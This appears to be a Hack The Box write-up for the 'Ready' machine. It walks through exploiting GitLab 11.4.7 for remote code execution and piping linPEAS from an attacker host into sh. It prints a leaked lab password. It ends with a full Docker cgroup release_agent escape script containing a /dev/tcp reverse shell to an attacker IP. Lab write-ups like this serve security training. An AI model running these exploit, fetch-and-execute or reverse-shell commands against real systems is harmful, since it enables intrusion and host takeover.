Machine Info
Machine Info

1. Enumeration:

  • Nmap:
  1. Web Enumeration:
  • PORT 5080: Got gitlab login form

let’s sign up:

and we ’re in:

checking /help :

  • it’s gitlab version 11.4.7

Searching for exploits:

  • got public one from exploitdb

  • let’s download and edit the exploit:

As i remember it didn’t work properly (there are some new versions of this exploit on exploitdb now) and i used another exploit from github back then

  • Github exploit:
    • download and edit:

  • python3 gitlab_rce.py http://10.10.10.220;5080 10.10.16.15

open netcat listener first and got session:

We are in as git

Got user dude flag:

Privilege Escalation:

  • let’s transfer our linPEAS script:

    • $ sudo python -m SimpleHTTPServer 80 » In the folder where linPEAS is

    • $ curl 10.10.16.15/linPEAS.sh | sh » On the target machine

It roams the target machine looking for any interesting stuff to privilege with it .. i’ll show the interesting ones only;

Possible private SSH keys were found!
/var/opt/gitlab/gitlab-rails/etc/secrets.yml

This gitlab.rb looks interesting:

lets check the important paths manually:

tons of tokens and private keys

lets check gitlab.rb:

Tons of configurations

  • lets just grep any passwords
    • cat gitlab.rb | grep -i password

and here we got the same password from the script again » wW59U!ZKMbG9+*#h

This will give us gitlab root not the root of ready ..

Rooting:

  • lets switch to gitlab root

  • docker privilege linux breakout » got this

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#For a normal PoC =================
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#===================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
chmod a+x /cmd
#===================================

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output

Let’s make a file and put this script into it:

  • don’t forget to put your own ip > mine 10.10.16.15:

let’s transfer it to target machine:

  • With changing it’s mode to executable and running our netcat first on port 9000 specified already in the script:

And here we go > finally got the root of ready machine:

Hope you enjoyed this writeup ..

If so kindly give me respect Wh1rlw1nd-HTB ..